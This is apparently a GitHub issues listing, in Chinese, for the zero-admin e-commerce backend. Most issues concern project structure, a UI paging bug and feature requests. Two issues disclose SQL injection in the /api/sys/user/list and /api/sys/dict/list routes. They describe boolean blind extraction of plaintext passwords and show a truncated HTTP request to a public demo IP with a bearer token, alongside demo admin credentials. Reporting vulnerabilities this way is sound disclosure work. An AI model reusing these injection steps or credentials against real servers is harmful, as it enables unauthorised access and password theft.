zero-admin icon indicating copy to clipboard operation
zero-admin copied to clipboard

Zero-Admin 是一套基于 go-zero 框架实现的电商系统的后端服务

Results 16 zero-admin issues
Sort by recently updated
recently updated
newest added

有没有哪位老哥大致跑过作者大大的这个项目,能简单说下业务结构和项目结构吗

交流群不建一个似乎说不过去吧?毕竟作为第一个go-zero后台项目????

http://129.204.22.242/ 账号:admin 密码: 123456 Connect Timeout [D]Connect Timeout|dial tcp4 129.204.22.242:80: i/o timeout

公司前端模板技术选型,zero-admin因为不能打开多个页面,直接被否了。这个功能很实际。

![image](https://user-images.githubusercontent.com/83437519/126245257-0a692ca2-0079-4377-9cdc-17965d25f2ad.png) 用户列表,点击翻页跳转再返回首页之后出现图中情况

# sql 注入获取其他账号密码 此处代码对应的路由是 `/api/sys/user/list` - 这段代码查的是带有账号密码字段的数据表,而且存在 sql 注入 - 数据库密码明文存储 那就可以使用布尔盲注挨个匹配出其他账号的密码明文 已知 demo 网站 admin 密码是 123456 此处做一个简单的注入判断 `sys_user.username like '%admin' AND sys_user.passsword like '124%'` 无匹配 ```http POST http://110.41.179.89/api/sys/user/list...

# sql 注入 此处代码对应的路由是 `/api/sys/dict/list` ```http POST http://110.41.179.89/api/sys/dict/list HTTP/1.1 Host: 110.41.179.89 Content-Length: 77 Accept: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102...